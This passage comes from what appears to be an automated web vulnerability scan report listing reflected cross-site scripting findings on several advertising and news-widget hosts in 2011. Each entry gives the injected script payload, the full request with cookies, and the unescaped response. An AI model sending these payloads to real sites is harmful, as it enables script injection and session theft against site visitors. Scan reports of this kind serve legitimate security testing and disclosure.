Cookie: partnerUID="eyI3OSI6IFsiNmNmN2Q2MjlkMzc5MWVlNjRhY2IyNzFkMGJiMTJkMzEiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyI4NjYzNDk2NzYyMjk0MzM3MjY1IiwgNzM0MjM2XSwgIjQiOiBbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsIDczNDIyOV19; uid=dcb84907-869e-4e7d-baf7-9761469e8965; segments_p1=eJzjYuF4vJaJi5mjMYKLheN5PyOQfDyBEShwkgNINEUAiX8g1n8fILGRAwAJqArM

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 11 Apr 2011 16:31:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 11-Apr-2011 16:30:58 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 299

document.write('<img width="0" height="0" src="http://tag.admeld.com/match47500';alert(1)//51d2b9b58a7?admeld_adprovider_id=300&external_user_id=dcb84907-869e-4e7d-baf7-9761469e8965&Expiration=1302971478&custom_user_segments=%2C11265%2C11266%2C18531%2C18407%2C1097%2C1073%2C38627%2C1150%2C9855"/>
...[SNIP]...
1.96. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd57a"><script>alert(1)</script>0a868d8e61c was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=cd57a"><script>alert(1)</script>0a868d8e61c&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=SW3rJqgjoGiWbsxPhJhuUWWxMGxBqXxlA7D4q3Fl0GwiKyVDZ-rlUa0PjsPAjhgqStkopvvsJjaal-ufKVKqXkB03KyfIYpUpwtuzDJ_Sar7e7JoB80Eyo7R1tfbpJ0eSKfnqP_XlFpzVu_NoBBDZf9ryhlXrOTIDLs6C5xYHwpXtg9v_8jp5kTH7j39bXO4HDAiYSWCf5TBxsTExpnDU-v7KYWwWySyXkfDPDV-90Ue7hujMrvtUY_HOzLLyxwv_k_WpVD1JlJ7wTXZp93gmXyGPktyqGq8AiF_9pGEULyDkw085boggUVNqI7LSpEciP1S6sY_4cbvTHGh_d5L4M2Y34-VIxRxrm3FNMwNqknU3Q4bI5W7lTITQmcWDWXNOxhfHiulcSpdCPufCeXVQBAN2VgvEMYtoUIh9zoiJ7cb_z_Zv6eqOhDMTIbw55SOLrPjw2_IYz3ZuGtYWAZLy7lobhRxhK7y214tJE76aWd_kg-ZEdanc90fnXgtJVs3zdKoHs-s6ourQpIu1BUXqe9NY9R0FFLnY-WSWcKKlWHHw3Jspg9faP3zaVLpnvgN8oSrQlTvHTstmPtZGHjqPSP0ejM63LRRDlKgB-853uBtSirquDzFGA9p44jqLK3f4LscmmzpkBgJLxKHAsFFjyh6Y5zkl1TBiIlnDmmKJhyo0oRzMvHykYeX9FLMbQ8G9mgZ2cDqwwmQZzMqCsZkVOfJTg_XDU56mTQdH2l7ql8VpPp5MG5XnklEXPyXHc-pfFF2s3dwkHxGaiVA20kK-J6KuQs_LwOPvzQpDuG9dNbgrjQUkFB5yftgNN38M2Bjl30yGuIFRAghkvG6HjVZ6HyGPktyqGq8AiF_9pGEULxPe8hUFHE8g9SabWo0E8RGMKpnHO-s5pzO2WZw5zfLrKjM26X_HQivaOXVI6rGEaaMWVYkNu7wPIhXuF40_123VpwLtdcLHNDm8GcOvspe-Q-igqd2bcsD7dfUNmWxbV3VWMkb_aLsCxsEnMVOX5E5YFw7AKKbNhAo6FAahFGuSw; fc=dEPMVIiYvtONV9jpk9DkXQyLbLTLmoxDqWV9gF0uTPvucCu1r5AQP_dtCZm2aJsazpYxj42KKzjVwuNPs4rt1xf3-af75uC-0PX6DzxDTAoc4kd67syCe9_zGNyNSePIsMBPVeJHxjpftOmXXvFTKA; pf=L5MO0qdKHkxVAs1r-dBZAVICFVVRojULXcUdCiWE_DzWmtZ8Ckr-ChxYFEOTgBiyn80YJ2icoIfewslpJRmSRHD2z0ji6gENI7UiUrBmIv7o9shIX27g1QvP1c0QMukRtSDU37zOz0DNE_e3YQHgt6PfhahENkA4k6rcd_yUFy9p-hKvqyNE9Rr8ioAUeiEMG4CCBugb2Y6MTgfIwgmcLBK5s3Fs844aAeTpp0nbQFccPj8VU4SIi83xitW9zSjuAvgCZESutjUEdNmYIQ31lCATfnMgILbvQ4xMuPQqLAgHZeAJs75EVnqq0zavBWyWJwFZsZdOB51cw1oZ9UpaJVMMlt7PvOlYtSv4FtGdwt2VYP-HkDJt0WDewvL54vJkOVFTzvB1vWGJ1KSsZdNYCEQB2WM1iCr-8Tnt4WJRQ1VrpjudXbSIMqSVZISkb6xz; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15074%7C15074%7C15069%7C15074%7Cundefined%7C15069%7C15074; rv=1; uid=4608069584519221037

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Sat, 08-Oct-2011 16:31:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:20 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&rnd=4424732433026300716&fpid=cd57a"><script>alert(1)</script>0a868d8e61c&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...
1.97. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9acee"><script>alert(1)</script>d7c2d8d54c7 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=9acee"><script>alert(1)</script>d7c2d8d54c7&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=SW3rJqgjoGiWbsxPhJhuUWWxMGxBqXxlA7D4q3Fl0GwiKyVDZ-rlUa0PjsPAjhgqStkopvvsJjaal-ufKVKqXkB03KyfIYpUpwtuzDJ_Sar7e7JoB80Eyo7R1tfbpJ0eSKfnqP_XlFpzVu_NoBBDZf9ryhlXrOTIDLs6C5xYHwpXtg9v_8jp5kTH7j39bXO4HDAiYSWCf5TBxsTExpnDU-v7KYWwWySyXkfDPDV-90Ue7hujMrvtUY_HOzLLyxwv_k_WpVD1JlJ7wTXZp93gmXyGPktyqGq8AiF_9pGEULyDkw085boggUVNqI7LSpEciP1S6sY_4cbvTHGh_d5L4M2Y34-VIxRxrm3FNMwNqknU3Q4bI5W7lTITQmcWDWXNOxhfHiulcSpdCPufCeXVQBAN2VgvEMYtoUIh9zoiJ7cb_z_Zv6eqOhDMTIbw55SOLrPjw2_IYz3ZuGtYWAZLy7lobhRxhK7y214tJE76aWd_kg-ZEdanc90fnXgtJVs3zdKoHs-s6ourQpIu1BUXqe9NY9R0FFLnY-WSWcKKlWHHw3Jspg9faP3zaVLpnvgN8oSrQlTvHTstmPtZGHjqPSP0ejM63LRRDlKgB-853uBtSirquDzFGA9p44jqLK3f4LscmmzpkBgJLxKHAsFFjyh6Y5zkl1TBiIlnDmmKJhyo0oRzMvHykYeX9FLMbQ8G9mgZ2cDqwwmQZzMqCsZkVOfJTg_XDU56mTQdH2l7ql8VpPp5MG5XnklEXPyXHc-pfFF2s3dwkHxGaiVA20kK-J6KuQs_LwOPvzQpDuG9dNbgrjQUkFB5yftgNN38M2Bjl30yGuIFRAghkvG6HjVZ6HyGPktyqGq8AiF_9pGEULxPe8hUFHE8g9SabWo0E8RGMKpnHO-s5pzO2WZw5zfLrKjM26X_HQivaOXVI6rGEaaMWVYkNu7wPIhXuF40_123VpwLtdcLHNDm8GcOvspe-Q-igqd2bcsD7dfUNmWxbV3VWMkb_aLsCxsEnMVOX5E5YFw7AKKbNhAo6FAahFGuSw; fc=dEPMVIiYvtONV9jpk9DkXQyLbLTLmoxDqWV9gF0uTPvucCu1r5AQP_dtCZm2aJsazpYxj42KKzjVwuNPs4rt1xf3-af75uC-0PX6DzxDTAoc4kd67syCe9_zGNyNSePIsMBPVeJHxjpftOmXXvFTKA; pf=L5MO0qdKHkxVAs1r-dBZAVICFVVRojULXcUdCiWE_DzWmtZ8Ckr-ChxYFEOTgBiyn80YJ2icoIfewslpJRmSRHD2z0ji6gENI7UiUrBmIv7o9shIX27g1QvP1c0QMukRtSDU37zOz0DNE_e3YQHgt6PfhahENkA4k6rcd_yUFy9p-hKvqyNE9Rr8ioAUeiEMG4CCBugb2Y6MTgfIwgmcLBK5s3Fs844aAeTpp0nbQFccPj8VU4SIi83xitW9zSjuAvgCZESutjUEdNmYIQ31lCATfnMgILbvQ4xMuPQqLAgHZeAJs75EVnqq0zavBWyWJwFZsZdOB51cw1oZ9UpaJVMMlt7PvOlYtSv4FtGdwt2VYP-HkDJt0WDewvL54vJkOVFTzvB1vWGJ1KSsZdNYCEQB2WM1iCr-8Tnt4WJRQ1VrpjudXbSIMqSVZISkb6xz; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15074%7C15074%7C15069%7C15074%7Cundefined%7C15069%7C15074; rv=1; uid=4608069584519221037

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Sat, 08-Oct-2011 16:31:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:19 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&rnd=7219586931718843848&fpid=4&nu=n&t=&sp=9acee"><script>alert(1)</script>d7c2d8d54c7&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...
1.98. http://studio-5.financialcontent.com/worldnow [Module parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /worldnow

Issue detail

The value of the Module request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99bba'-alert(1)-'73353dd3a4c was submitted in the Module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldnow?Module=snapshot99bba'-alert(1)-'73353dd3a4c&OutputMode=JS HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:09 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 09 Apr 2011 12:34:09 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 702


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fworldnow%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Module%3Dsnapshot99bba'-alert(1)-'73353dd3a4c%26OutputMode%3DJS&Type=widget&Client=worldnow&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var scrip
...[SNIP]...
1.99. http://studio-5.financialcontent.com/worldnow [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /worldnow

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5de31'-alert(1)-'8e569af08fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldnow5de31'-alert(1)-'8e569af08fe?Module=snapshot&OutputMode=JS HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:11 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 09 Apr 2011 12:34:11 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 730


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fworldnow5de31'-alert(1)-'8e569af08fe%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Module%3Dsnapshot%26OutputMode%3DJS&Type=widget&Client=worldnow5de31'-alert(1)-'8e569af08fe&rand=' + Math.random();
head.appendChild(scrip
...[SNIP]...
1.100. http://studio-5.financialcontent.com/worldnow [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /worldnow

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67c45'-alert(1)-'c942bb7c086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldnow?Module=snapshot&OutputMode=JS&67c45'-alert(1)-'c942bb7c086=1 HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:10 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 09 Apr 2011 12:34:10 GMT
Expires: Sat, 09 Apr 2011 12:35:10 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 20457

document.write('\n');
document.write('<style>\n');
document.write('\n');
document.write('\/* FCWidget CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' font-family: Arial,Verdana
...[SNIP]...
tp://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fworldnow%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Module%3Dsnapshot%26OutputMode%3DJS%2667c45'-alert(1)-'c942bb7c086%3D1&Type=widget&Client=worldnow&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.cre
...[SNIP]...
1.101. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ulocal.wptz.com
Path:   /service/isUserLoggedIn.kickAction

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 90e51<script>alert(1)</script>5adadb362d8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service/isUserLoggedIn.kickAction?callback=ka_isUserLoggedInKASideCallback90e51<script>alert(1)</script>5adadb362d8&as=62976 HTTP/1.1
Host: ulocal.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2064108896-1302352190176; AxData=; Axxd=1; __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.12.10.1302352179

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=35BF8CB48F1E6719832598132E6EFC57; Path=/
Set-Cookie: as=62976; Expires=Sun, 10-Apr-2011 12:31:42 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
Content-Length: 97
Date: Sat, 09 Apr 2011 12:31:41 GMT
Set-Cookie: BIGipServerapp_server_pool=1823451328.39455.0000; path=/

ka_isUserLoggedInKASideCallback90e51<script>alert(1)</script>5adadb362d8({"isLoggedIn":"false"});
1.102. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a92e4'-alert(1)-'7ca9a65bd05 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_js.js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338a92e4'-alert(1)-'7ca9a65bd05&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338a92e4'-alert(1)-'7ca9a65bd05&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');

1.103. http://um.simpli.fi/am_js.js [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10f86'-alert(1)-'cf2f0b7538c was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_js.js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match10f86'-alert(1)-'cf2f0b7538c HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match10f86'-alert(1)-'cf2f0b7538c?admeld_adprovider_id=338&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');

1.104. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9729f'-alert(1)-'f20247805be was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=3389729f'-alert(1)-'f20247805be&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=3389729f'-alert(1)-'f20247805be&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');

1.105. http://um.simpli.fi/am_match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d23e'-alert(1)-'a7e3cfc3d3f was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9d23e'-alert(1)-'a7e3cfc3d3f HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
